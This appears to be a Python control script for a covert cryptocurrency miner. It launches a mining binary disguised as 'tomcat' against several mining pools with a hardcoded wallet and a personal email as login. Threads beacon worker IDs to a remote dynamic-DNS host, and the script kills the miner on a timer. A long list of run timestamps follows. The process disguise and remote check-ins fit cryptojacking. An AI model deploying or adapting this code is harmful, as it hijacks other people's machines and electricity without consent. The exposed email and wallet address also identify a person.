import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:55:06.969640
#2018-02-17 16:42:06.439785
#2018-02-17 18:29:04.499579
#2018-02-17 20:18:03.694890
#2018-02-17 22:05:04.778971
#2018-02-17 23:49:01.443061
#2018-02-18 01:38:07.908639
#2018-02-18 03:25:07.877758
#2018-02-18 05:13:03.651625
#2018-02-18 07:05:09.035941
#2018-02-18 08:56:05.071197
#2018-02-18 10:43:05.090448
#2018-02-18 12:28:01.784032
#2018-02-18 14:16:05.254067
#2018-02-18 16:06:05.580210
#2018-02-18 17:54:06.148415
#2018-02-18 19:45:07.770390
#2018-02-18 21:31:06.390774
#2018-02-18 23:19:05.252328
#2018-02-19 01:07:01.664442
#2018-02-19 02:53:06.059170
#2018-02-19 04:41:05.703770
#2018-02-19 06:25:03.584598
#2018-02-19 08:14:06.766624
#2018-02-19 10:04:08.624510
#2018-02-19 11:53:06.701559
#2018-02-19 13:39:04.856277
#2018-02-19 15:26:08.238355
#2018-02-19 17:14:07.465084
#2018-02-19 19:02:06.828743
#2018-02-19 20:48:07.637838
#2018-02-19 22:35:07.588909
#2018-02-20 00:20:07.851195
#2018-02-20 02:09:06.902021
#2018-02-20 04:01:06.262096
#2018-02-20 05:45:09.499432
#2018-02-20 07:31:04.602880
#2018-02-20 09:15:07.526808
#2018-02-20 10:58:07.117946
#2018-02-20 12:47:04.586446
#2018-02-20 14:33:07.789203
#2018-02-20 16:18:04.747882
#2018-02-20 18:05:03.147376
#2018-02-20 19:55:07.956941
#2018-02-20 21:43:02.076067
#2018-02-20 23:25:08.120262
#2018-02-21 01:12:01.846348
#2018-02-21 02:58:06.741448
#2018-02-21 04:46:07.397046
#2018-02-21 06:34:06.717977
#2018-02-21 08:21:14.113220
#2018-02-21 10:07:01.934041
#2018-02-21 11:54:04.774939
#2018-02-21 13:45:04.608683
#2018-02-21 15:32:01.869761
#2018-02-21 17:22:09.068338
#2018-02-21 19:11:06.809491
#2018-02-21 20:59:05.235087
#2018-02-21 22:46:07.357270
#2018-02-22 00:37:06.064574
#2018-02-22 02:24:08.007910
#2018-02-22 04:11:05.312601
#2018-02-22 05:56:01.850400
#2018-02-22 07:42:06.285276
#2018-02-22 09:31:07.256425
#2018-02-22 11:17:04.371412
#2018-02-22 13:04:08.045051
#2018-02-22 14:52:01.547083
#2018-02-22 16:38:02.198925
#2018-02-22 18:23:02.180871
#2018-02-22 20:18:04.244131
#2018-02-22 22:05:08.563671
#2018-02-22 23:51:05.652708
#2018-02-23 01:40:07.362776
#2018-02-23 03:27:05.618014
#2018-02-23 05:12:07.431327
#2018-02-23 06:58:06.997074
#2018-02-23 08:47:06.787034
#2018-02-23 11:10:01.472192
#2018-02-23 13:03:04.624052
#2018-02-23 14:48:09.552698
#2018-02-23 16:37:07.244006
#2018-02-23 18:24:01.864690
#2018-02-23 20:08:08.065771
#2018-02-23 21:56:07.945748
#2018-02-23 23:44:07.954604
#2018-02-24 01:36:04.874686
#2018-02-24 03:26:03.491494
#2018-02-24 05:11:07.932710
#2018-02-24 07:00:04.008311
#2018-02-24 08:49:01.190290
#2018-02-24 10:49:04.234378
#2018-02-24 12:36:05.412841
#2018-02-24 14:24:05.653774
#2018-02-24 16:12:07.642445
#2018-02-24 18:04:07.029319
#2018-02-24 19:50:09.333494
#2018-02-24 21:34:07.428876
#2018-02-25 00:22:03.424919
#2018-02-25 04:12:01.809559
#2018-02-25 07:43:04.189870